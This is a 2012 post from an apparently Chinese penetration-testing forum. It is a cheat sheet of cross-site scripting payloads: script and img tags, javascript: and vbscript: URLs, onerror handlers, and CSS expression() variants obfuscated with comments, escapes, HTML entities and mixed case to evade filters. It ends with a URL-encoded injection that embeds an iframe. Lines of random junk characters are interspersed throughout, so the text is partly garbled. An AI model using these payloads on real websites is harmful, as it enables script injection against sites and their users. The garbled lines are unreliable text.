中国网络渗透测试联盟
标题:
xss
[打印本页]
作者:
admin
时间:
2012-9-15 14:09
标题:
xss
<script>alert("跨站")</script> (最常用)
* |3 T: l) B& [
<img scr=javascript:alert("跨站")></img>
" _( r a0 @# O3 Q) F8 Z& z6 P
<img scr="javascript: alert(/跨站/)></img>
; V2 a0 X6 L5 f0 j, J. j Q
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
1 y$ i" x( V. D0 w$ r+ Z
<img scr="#" onerror=alert(/跨站/)></img>
. K- x( s9 J& B( a$ m
<img scr="#" style="xss:expression(alert(/xss/));"></img>
# h4 p) d7 f/ }
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
* x' n0 C, d# d
<img src=vbscript:msgbox ("xss")></img>
* s! _' P; u: L
<style> input {left:expression (alert('xss'))}</style>
- H/ E5 D6 K7 h" s
<div style={left:expression (alert('xss'))}></div>
$ W- B: f" E5 y" h) n. l( A; o
<div style={left:exp/* */ression (alert('xss'))}></div>
" W7 f' F9 ?, f, ~
<div style={left:\0065\0078ression (alert('xss'))}></div>
8 ?" v( G/ D4 i+ W: K9 m; `9 b
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
! ]2 f+ @) S+ [/ }% c6 R" r6 B3 `
unicode <div style="{left:expRessioN (alert('xss'))}">
9 F. v" X7 e# r
7 J; {6 i$ X2 {( a: B( j
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
5 N9 K0 V) H5 ?3 Y+ S# ^' r5 W
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2